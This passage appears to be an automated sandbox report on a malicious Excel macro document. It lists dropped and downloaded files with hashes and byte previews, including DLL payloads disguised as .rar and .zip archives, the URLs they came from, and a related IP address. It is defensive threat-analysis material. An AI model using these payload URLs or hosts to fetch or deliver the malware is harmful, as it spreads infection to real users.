                                                                                                INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                • 194.225.58.214
                                                                                                INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                                • 194.225.58.214
                                                                                                Document74269.xlsGet hashmaliciousBrowse
                                                                                                • 194.225.58.214
                                                                                                Document74269.xlsGet hashmaliciousBrowse
                                                                                                • 194.225.58.214

                                                                                                Dropped Files

                                                                                                No context

                                                                                                Created / dropped Files

                                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                                                Category:dropped
                                                                                                Size (bytes):58936
                                                                                                Entropy (8bit):7.994797855729196
                                                                                                Encrypted:true
                                                                                                SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                                                MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                                                SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                                                SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                                                SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                                                Malicious:false
                                                                                                Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):893
                                                                                                Entropy (8bit):7.366016576663508
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                                                                                MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                                                                                SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                                                                                SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                                                                                SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                                                                                Malicious:false
                                                                                                Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):326
                                                                                                Entropy (8bit):3.1147363886328936
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:kKtJwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:4kPlE99SNxAhUegeT2
                                                                                                MD5:DF1E09CF3775145C442F9FB0AB6C362A
                                                                                                SHA1:1AE04CB8F8A23F05DA7CF04B831638D7ED73D439
                                                                                                SHA-256:DEE970688D1406C921AF17F7D8CB30E235E4B1A361A8B172E34D8CEBD4494C65
                                                                                                SHA-512:DFA401348D067355400674F91DAEFA19D5051E9EC9C6027C555ED04078B6B66718EE862F980DD1DA8191BD89103A49882B1F3909B626CCE2877C72507AD1D86D
                                                                                                Malicious:false
                                                                                                Preview: p...... ........"...Q...(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):252
                                                                                                Entropy (8bit):3.0294634724686764
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:kkFklsZEttfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKnERliBAIdQZV7eAYLit
                                                                                                MD5:10E3FF0416066B18C49A1656EFABC8B0
                                                                                                SHA1:11037AE57ED5FFD7695302D7F3BA7CD23E708759
                                                                                                SHA-256:96797ACFDC1A043CCF1D0FB07F8E331655A151C27B06FCE35D3F69EE6566D523
                                                                                                SHA-512:6CBFA7E675415FC4016B72A9966CF18EBF4CDBE4F08530C0F41C8FC3333DDD95347BD7C0D44DDF6C2CADA2B897BC1D9607792AEBF34173212C9FA62BA3B90337
                                                                                                Malicious:false
                                                                                                Preview: p...... ....`.......Q...(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\gjeicn6u9[1].rar
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):6.930178555398242
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:cqJOEsToMKj1cuVA711wqG99e7WhVEyIzQu18Ax9Vnysq4p:ZJ6Kj1cue711wqi9e8VHZix9Vysq4p
                                                                                                MD5:5589EA0025F3F1B4DDAC99B9DF2FD133
                                                                                                SHA1:1F1F0189AEFC627A954C7FC30DD57AA65BBC1CBB
                                                                                                SHA-256:11D900EFD3629DF06B0FA04968E024F4C4CE5B2DC2BA231160712ACC7791B76E
                                                                                                SHA-512:BA0D72C133333FF8423D7BB40F994FD75D372A1497FBD23B9D6E3BC407D6D0E22C2661242B8C4DF93371970EF745E03A6595DA9594E89872C8339593BEEAA4A2
                                                                                                Malicious:true
                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o.{.o.{.o.{...x.b.{...~..{.....x.{..~.M.{......{..x.y.{.....j.{.o.z.;.{..r.n.{..{.n.{....n.{..y.n.{.Richo.{.........PE..L......]...........!.....t................................................................@.............................d...4...P....P.......................`...'..|...T..............................@............................................text....r.......t.................. ..`.rdata...X.......Z...x..............@..@.data....[..........................@....rsrc........P......................@..@.reloc...'...`...(..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\or3peb[1].rar
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:downloaded
                                                                                                Size (bytes):856064
                                                                                                Entropy (8bit):6.628843593684541
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:DIRKl993y8SebVD0DJZ58TCBjDGfYn+dcZGUgpsI9w3pYPuydt4We6NBexcpFqme:sRKE3eJDUJsTCZSfmUU+9Yz0Og
                                                                                                MD5:4746FBED409F87EC6DDB6653CB4E201C
                                                                                                SHA1:B8EE3F60F74553E44D42B0F47A0A4A55ED644C97
                                                                                                SHA-256:864E95D36584E9DB7BCD7552272E446A4C7CBC6601DCD4F4A2687D96374B439B
                                                                                                SHA-512:E6DEF1B637B3AEA0D0F4ED27ADD38E9330E15CDA1A38A1DD228799296497DDD0BF13F89022F0491FA98E735B5CCFF0F621429A7606D6C3ECB0F57372157B405C
                                                                                                Malicious:true
                                                                                                IE Cache URL:https://shopandmartonline.com/or3peb.rar
                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o.{.o.{.o.{...x.b.{...~..{.....x.{..~.M.{......{..x.y.{.....j.{.o.z.;.{..r.n.{..{.n.{....n.{..y.n.{.Richo.{.........PE..L......]...........!.....t................................................................@.............................d...4...P....P.......................`...'..|...T..............................@............................................text....r.......t.................. ..`.rdata...X.......Z...x..............@..@.data....[..........................@....rsrc........P......................@..@.reloc...'...`...(..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\hknmwj[1].zip
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:downloaded
                                                                                                Size (bytes):856064
                                                                                                Entropy (8bit):6.628853255480928
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:LIRKl993y8SebVD0DJZ58TCBjDGfYn+dcZGUgpsI9w3pYPuydt4We6NBexcpFqmq:ERKE3eJDUJsTCZSfmUU+9Yz0Og
                                                                                                MD5:B613AB3EEF642E50999219C6BC103C24
                                                                                                SHA1:D2DF29F7ACFC78B500217AF07BC69B558E08D12E
                                                                                                SHA-256:4BFDDDE9F8B6C92A2436385CEDF3F5ACF3A3284A22F40390A503DECAD56EECF9
                                                                                                SHA-512:DC8B8909964B85799DA724B38A1D6A8EC96B64B3A8BB359B1647AF6B009A363A7343DDA93C44AF362D3476939A731FE7A333E07CB329D41E4E4095CB8D0B3527
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 9%
                                                                                                IE Cache URL:http://stellarum.com.br/hknmwj.zip
                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o.{.o.{.o.{...x.b.{...~..{.....x.{..~.M.{......{..x.y.{.....j.{.o.z.;.{..r.n.{..{.n.{....n.{..y.n.{.Richo.{.........PE..L.....]...........!.....t................................................................@.............................d...4...P....P.......................`...'..|...T..............................@............................................text....r.......t.................. ..`.rdata...X.......Z...x..............@..@.data....[..........................@....rsrc........P......................@..@.reloc...'...`...(..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\clh6qq[1].zip
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:modified
                                                                                                Size (bytes):32768
                                                                                                Entropy (8bit):6.908368157415385
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:PqJOEsToMKj1c9VA711wqG99e7WhVEyIzQu18t:CJ6Kj1c9e711wqi9e8VHZD
                                                                                                MD5:0A7945CBC0178E94E51FBFEB7E4B87EF
                                                                                                SHA1:AD4DF936C9ABB4C956DF6FC37A6E3120A9E36603
                                                                                                SHA-256:3DA4558EEA9D229912F46D1D14906CB9837436A76AB81AAF8DB44182C9148BE8
                                                                                                SHA-512:4EB0B69BE8C99B127F7A9353FE757F64B61FE63E9A0D2570E586975B773A9760B10A322FE8A1B2149F49D8C5D2BC3D1F7110F86B994FD2AAEF967261065F3F25
                                                                                                Malicious:true
                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o.{.o.{.o.{...x.b.{...~..{.....x.{..~.M.{......{..x.y.{.....j.{.o.z.;.{..r.n.{..{.n.{....n.{..y.n.{.Richo.{.........PE..L.....]...........!.....t................................................................@.............................d...4...P....P.......................`...'..|...T..............................@............................................text....r.......t.................. ..`.rdata...X.......Z...x..............@..@.data....[..........................@....rsrc........P......................@..@.reloc...'...`...(..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\l3v7tq4[1].rar
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:downloaded
                                                                                                Size (bytes):856064
                                                                                                Entropy (8bit):6.628843593684541
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:DIRKl993y8SebVD0DJZ58TCBjDGfYn+dcZGUgpsI9w3pYPuydt4We6NBexcpFqme:sRKE3eJDUJsTCZSfmUU+9Yz0Og
                                                                                                MD5:4746FBED409F87EC6DDB6653CB4E201C
                                                                                                SHA1:B8EE3F60F74553E44D42B0F47A0A4A55ED644C97
                                                                                                SHA-256:864E95D36584E9DB7BCD7552272E446A4C7CBC6601DCD4F4A2687D96374B439B
                                                                                                SHA-512:E6DEF1B637B3AEA0D0F4ED27ADD38E9330E15CDA1A38A1DD228799296497DDD0BF13F89022F0491FA98E735B5CCFF0F621429A7606D6C3ECB0F57372157B405C
                                                                                                Malicious:true
                                                                                                IE Cache URL:https://qsf.surfescape.net/l3v7tq4.rar
                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o.{.o.{.o.{...x.b.{...~..{.....x.{..~.M.{......{..x.y.{.....j.{.o.z.;.{..r.n.{..{.n.{....n.{..y.n.{.Richo.{.........PE..L......]...........!.....t................................................................@.............................d...4...P....P.......................`...'..|...T..............................@............................................text....r.......t.................. ..`.rdata...X.......Z...x..............@..@.data....[..........................@....rsrc........P......................@..@.reloc...'...`...(..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A64C1FA3.emf
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                Category:dropped
                                                                                                Size (bytes):1408
                                                                                                Entropy (8bit):2.480393394045803
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:YmOALmlzslqcuMap0bCvIEeQpN4lZsrBKlhuzK6ll6uatDUdG3tLMk+QCeJ1OcrI:Yf9s40bi34giukueDUdG3teh
                                                                                                MD5:06CEB615EBA04193F1167A8E16D24D72
                                                                                                SHA1:E3BEB08C64C56D72BD7E333EC25E7139A3639580
                                                                                                SHA-256:A1D83B13577385965D59963AF5C15DECA6DE97AAA0C0C0446EBB4F46EE340309
                                                                                                SHA-512:59F26C72A1124548CCB0C4598B709FD00E497F50EC181278B06EAC62EC19F943853142E596BE5A0136F524F9E13B05547B3648A2161E22D030D5B7128122EEC5
                                                                                                Malicious:false
                                                                                                Preview: ....l................................... EMF........).......................`...1........................|..F...........GDIC........L.lQ......................................................................................................iii.......-.....................-.....................-.....................-.....................-.........!...............'...........................-.........!.........................$.............................-...............'.................$.............................-...............'.......................................................................................!...............................!...............................'...............iii.....%...........'.......................%...........'.......................%...........'.......................%...........'.......................%...........L...d...................................!..............?...........?................................"...........!...................
                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B460DCA9.png
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:PNG image data, 200 x 254, 8-bit colormap, non-interlaced
                                                                                                Category:dropped
                                                                                                Size (bytes):3002
                                                                                                Entropy (8bit):7.906419168841271
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:4MG29JWe/2RNqBIXXwVNLYkCdMSktTRjwDL/F2b73QXzHwdtNdgFBMn8mKL:4MGisWBuXcUkiH2KdMozQdtNd7wL
                                                                                                MD5:7E8C8DDAE452014B6DAE41F13E3945EF
                                                                                                SHA1:D70ECBB146F1BF78DA70A3D387EB1CDAF480CF9C
                                                                                                SHA-256:01C390937B5D91BC26ED089AB82DB7CC7B1CCDC712244F648EE1348FE15D0C46
                                                                                                SHA-512:B12CB86CD9B1BA497ED5F1D283321505AF0708603B840D2B25357BBA8167209114CD72A1EE4F6D489EEF97039436117AEBEA1ABD5DF8AA395684DD0BFDF4931A
                                                                                                Malicious:false
                                                                                                Preview: .PNG........IHDR.............H.......tEXtSoftware.Adobe ImageReadyq.e<....PLTE.......onp.............=o...8IDATx..]...0.......W..;..vL..u.W}... P?d...@.H.I .$.|6.,...B...dO..>({..E.T..P......O...~.....Y......*|.H....+u..|A..n.rC....U.......\.....rm/.0]....)........f....iG..' ..(.}..,@.zD.bK..g.U.U..... ...."m".]g-"D..E.6.V.-R.H}{.\..7.........Q..6. ........Y..}g.Z...@D.O....v9.H....Y.;4.b9u.~.F.G...G..pm..........`...4..I.TM.(...GV...pr M.P...nl......H..!..N.".....!. =.i...!..3;....<.,/H.....et...@.H.I .d` .yf.s.....-@X.`Bq...T]:..^...Q%...A$_....'..V.K$.....V .$-1....V)..Y...8.J O.V!..*41..I....4^!qs...(..C..... .]T...sb..%..g..F ....Fw..-....y..P[C...C....'..[.5.7(...I.%z'.Vgev.g}[....yo.!L]......;-.Y.6...(.......@.7..0....d..GY..q....o..*..7r.q>=qH..^.......;..b....B...(.L].m...H...J"..hs.:R...F.^K...$...WI..'-.~..7..mDLD.*.....}..C.S........]..lJ.H...\t..b..c......y;.C]..[>...+I .$.$..r. L.-...@.H.a.S..OF.|4.;..cW...>...g....l./-
                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD638D48.png
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:PNG image data, 247 x 76, 8-bit colormap, non-interlaced
                                                                                                Category:dropped
                                                                                                Size (bytes):1410
                                                                                                Entropy (8bit):7.761009123150044
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:bLdquwHt3Tm70jwSYpRqaTBIoY6lqSGbeRE2lCCqPtm69A3A9taREqVPNoLLk9:XMRhwSYWYioxRE2letP9A3AaVELk9
                                                                                                MD5:766C3D5E7B46F9106C4199126F75F1D6
                                                                                                SHA1:E3BE7D184728E7CAD36ABFD1CB8291DBBE2DDB92
                                                                                                SHA-256:57ECD0C929D294F692E9EFE0BFDF14A047CBEA50994DA7BE0055023F13D516F2
                                                                                                SHA-512:36185630CD8DCA8C1A77D0572576707F5A9493D8BF96CF8FEF38DA5BFF6D995466B17FC7CACD6A0A55241707B2B1B0473E552C596931724A0CE43AD7A635BDD4
                                                                                                Malicious:false
                                                                                                Preview: .PNG........IHDR.......L......_......tEXtSoftware.Adobe ImageReadyq.e<....PLTE.....$bgk#.........}..q.8.....IDATx....*.......x...L...;...1.......,..r.-..r..R..[..{.&...RB/ K-...4S']q/...~A]Fl..%....F....#e.....)A.z.k.\.....Y...k+.....z.@.I.e....7..M..B.=.....kX.V....WQ.y.;......w..R|.]..E...`.k..@cnh.[..D.X.;.v..(.PPmu...k..p..t...Ob..SW1...[.Tv.......^.tb...Fh..G..45^.r.......}s....|.....wqw..^&k.ws..7.9.......1>....o.W..=...rn7;.w.i.@...s.3/8h.A.fS.....X3.{~..O.n.:.7.#.$..t..)7...gss...C...!....E..:.b+3.[......d.a.Ey....eY..Q.....F...nl}.8...\.%n......L."o./}....B7oi.L..\.?.........U-C....BM..`.z.z..XG..%6..kyW.KD.y..{.W......A.a...CI...z..t.c.9...o..[.........MG....w..;.+.D.m...Y;.......n.M[.E.j..86'n\Rj.../.V.....2.O.6T...C.7.%.....p..tAU+...b&v..F7b....aH.B........;Qf......g...-q0...y..r..4.y.+.<.e.k..'.G...r.1[Q..1r..........SN.n2...%<.).. ^.....Cu......|...K<.7j..Q..x.(.q.G.k..-.[....[^....F...xV...w..{9...X...W...M.r4..-.......r.
                                                                                                C:\Users\user\AppData\Local\Temp\561F0000
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):51783
                                                                                                Entropy (8bit):7.8028777584719435
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:X/kvxtnsJeoRJyX1LF1CgOQJCzN/XFqcvh:XcpB32KLFqQJCzNn
                                                                                                MD5:32EF05AD85A38FACFA514BE77D73985F
                                                                                                SHA1:E274BF14E01F0C655D048EB6DE0A0037832483AD
                                                                                                SHA-256:8E88147160B0DF345E79E07628EF2A2A67270EB64AADDB8725EAEF8164F7236D
                                                                                                SHA-512:CA5F3856857B56B0D6058A2824C8C45BF764C0FDDC4CD474C35C7CD0F1239DF20E63B126D4F4BA78BDA46C80D4E2429C2086D274E6CF96EDEA353D45DECC6F6B
                                                                                                Malicious:false
                                                                                                Preview: .VKo.0..W..@.V.M*UU.l.Mzl#%.z.....K.C...1l6..F........a}.*.4.0:'..$..)..r...K..$>0]0i4.d..\m.Y..-.......~.......q.4N..........^.V.(7:..i..d....=..8.;..M...{Q*'.Z)8.h.6.8.IMY.......3o.....A..:....B..<...VW'.BE.q~....D.i\..8...4...s.!......w.....2..q\3...9..{..Gc..T9Q@r.\...n!m%}4n.5f.M..j..r.Y...b....p...........i7\,.|F........L..#.B..gD./|..O>.."......NEG3..>.%.W..'.S.....`..^..K...E..{z......ft......0.#........Tb.A.!1Q..-.u.'.-!~..qcCDb..:X~6.ZOD........3Ty.......q..................PK..........!...U.............[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                C:\Users\user\AppData\Local\Temp\Cab290.tmp
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                                                Category:dropped
                                                                                                Size (bytes):58936
                                                                                                Entropy (8bit):7.994797855729196
                                                                                                Encrypted:true
                                                                                                SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                                                MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                                                SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                                                SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                                                SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                                                Malicious:false
                                                                                                Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                                                C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):241332
                                                                                                Entropy (8bit):4.20675637693048
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:cGdLEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:cYNNSk8DtKBrpb2vxrOpprf/nVq
                                                                                                MD5:12CE50A0903414B6DAD881529AC9527F
                                                                                                SHA1:893F555E08DB39287D1418353954DAC578E16FAF
                                                                                                SHA-256:068584F79F99C76B3B73E18EA25A5F0A0D4E56BE99D37D3A02361C9F5B2CBCAE
                                                                                                SHA-512:5F007A0157B586CDDC2D1E9812B280717702A51A0F68C63BEA826625A34E79FA7275301F3EF5203E3256AECDB91C56E146194554B931BA57BD58757526511AD1
                                                                                                Malicious:false
                                                                                                Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................H...4............................................................................x...I..............T............ ..P........................... ...........................................................&!..............................................................................................
                                                                                                C:\Users\user\AppData\Local\Temp\Tar2A1.tmp
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):152533
                                                                                                Entropy (8bit):6.31602258454967
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                                                                MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                                                                SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                                                                SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                                                                SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                                                                Malicious:false
                                                                                                Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                                C:\Users\user\AppData\Local\Temp\kxwni.dll
